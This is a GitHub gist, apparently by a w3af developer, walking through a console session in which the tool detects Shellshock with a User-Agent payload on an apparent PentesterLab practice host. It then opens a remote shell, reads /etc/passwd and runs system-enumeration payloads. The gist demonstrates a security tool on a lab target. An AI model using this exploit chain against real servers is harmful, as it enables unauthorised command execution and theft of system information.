Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
w3af can now exploit shell shock!
w3af>>> plugins
w3af/plugins>>> audit shell_shock
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> set target http://shellshock.notsosecure.com/cgi-bin/status
w3af/config:target>>> back
The configuration has been saved.
w3af>>> start
Shell shock was found at: "http://shellshock.notsosecure.com/cgi-bin/status", using HTTP method GET.
The modified header was: "User-Agent" and it's value was: "() { :;}; echo "shellshock: check"".
This vulnerability was found in the request with id 33.
Scan finished in 8 seconds.
Stopping the core...
w3af>>> exploit
w3af/exploit>>> exploit os_commanding
os_commanding exploit plugin is starting.
Vulnerability successfully exploited.
Generated shell object <os_commanding object (ruser: "pentesterlab" |
rsystem: "Linux vulnerable 3.14.1-pentesterlab")>
Vulnerability successfully exploited. This is a list of available shells and proxies:
- [0] <os_commanding object (ruser: "pentesterlab" | rsystem: "Linux vulnerable 3.14.1-pentesterlab")>
Please use the interact command to interact with the shell objects.
w3af/exploit>>> interact 0
Execute "exit" to get out of the remote shell.
Commands typed in this menu will be run through the os_commanding shell.
w3af/exploit/os_commanding-0>>> e cat /etc/passwd
root:x:0:0:root:/root:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/false
tc:x:1001:50:Linux User,,,:/home/tc:/bin/sh
pentesterlab:x:1000:50:Linux User,,,:/home/pentesterlab:/bin/sh
w3af/exploit/os_commanding-0>>> e ls -la /
total 4
drwxr-xr-x 18 tc staff 400 Sep 25 12:05 .
drwxr-xr-x 18 tc staff 400 Sep 25 12:05 ..
drwxr-xr-x 2 root root 1500 Sep 25 12:05 bin
drwxr-xr-x 2 root root 60 Sep 25 12:05 boot
drwxrwxr-x 14 root staff 4360 Sep 25 12:05 dev
drwxr-xr-x 10 root root 800 Sep 25 14:42 etc
drwxrwxr-x 3 root staff 60 Sep 25 12:05 home
-rwxr-xr-x 1 root root 496 Sep 25 09:57 init
drwxr-xr-x 5 root root 860 Sep 25 12:05 lib
lrwxrwxrwx 1 root root 11 Sep 25 12:05 linuxrc -> bin/busybox
drwxr-xr-x 4 root root 80 Sep 25 12:05 mnt
drwxr-xr-x 2 root root 160 Sep 25 12:05 opt
dr-xr-xr-x 68 root root 0 Sep 25 12:05 proc
drwxrwxr-x 2 root staff 120 Sep 25 12:28 root
drwxrwxr-x 4 root staff 80 Sep 25 12:05 run
drwxr-xr-x 2 root root 1200 Sep 25 12:05 sbin
dr-xr-xr-x 12 root root 0 Sep 25 12:05 sys
drwxrwxrwt 4 root staff 140 Sep 25 12:54 tmp
drwxr-xr-x 8 root root 200 Sep 25 12:05 usr
drwxr-xr-x 9 root root 200 Sep 25 06:30 var
w3af/exploit/os_commanding-0>>> e whoami
pentesterlab
w3af/exploit/os_commanding-0>>> help
Available commands:
help Display this information
lsp List payloads
payload <payload> Execute "payload" and get the result
read <file> Read the remote server <file> and echo to this console
write <file> <content> Write <content> to the remote <file>
upload <local> <remote> Upload <local> file to <remote> location
execute <cmd>
exec <cmd>
e <cmd> Run <cmd> on the remote operating system
exit Exit this shell session
w3af/exploit/os_commanding-0>>> lsp
apache_config_directory
apache_config_files
apache_htaccess
apache_mod_security
...
udp
uptime
users
users_config_files
w3af_agent
w3af/exploit/os_commanding-0>>> payload users
|----------------------------------------------------------------------------|
| User | Home directory | Shell | Description |
|----------------------------------------------------------------------------|
| nobody | /nonexistent/ | /bin/false | nobody |
| root | /root/ | /bin/sh | root |
| tc | /home/tc/ | /bin/sh | Linux User |
| lp | /var/spool/lpd/ | /bin/sh | lp |
| pentesterlab | /home/pentesterlab/ | /bin/sh | Linux User |
|----------------------------------------------------------------------------|
w3af/exploit/os_commanding-0>>> payload cpu_info
|-----------------------------------------------------------------------------|
| Description | Value |
|-----------------------------------------------------------------------------|
| cpu_info | AMD Opteron(TM) Processor 6272 |
| cpu_cores | 1 |
|-----------------------------------------------------------------------------|
w3af/exploit/os_commanding-0>>> payload uptime
|----------------------------------------------------------------------------|
| Description | Hours | Minutes | Seconds |
|----------------------------------------------------------------------------|
| idletime | 25 | 16 | 54 |
| uptime | 25 | 17 | 37 |
|----------------------------------------------------------------------------|
w3af/exploit/os_commanding-0>>>
@andresriancho

This comment has been minimized.

Copy link
Owner Author

andresriancho commented Sep 26, 2014

Exploitation is really cool since it doesn't require any third-party host to create a reverse shell, receive the result, etc. nor requires any staging payload: it's all done in one HTTP request/response loop.

The shell-shock exploit source code is available here and as you'll be able to see it fits right into our framework.

Try it yourself!

git clone https://github.com/andresriancho/w3af.git
cd w3af
git checkout develop
./w3af_console

And then type the commands above.

@andresriancho

This comment has been minimized.

Copy link
Owner Author

andresriancho commented Sep 26, 2014

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.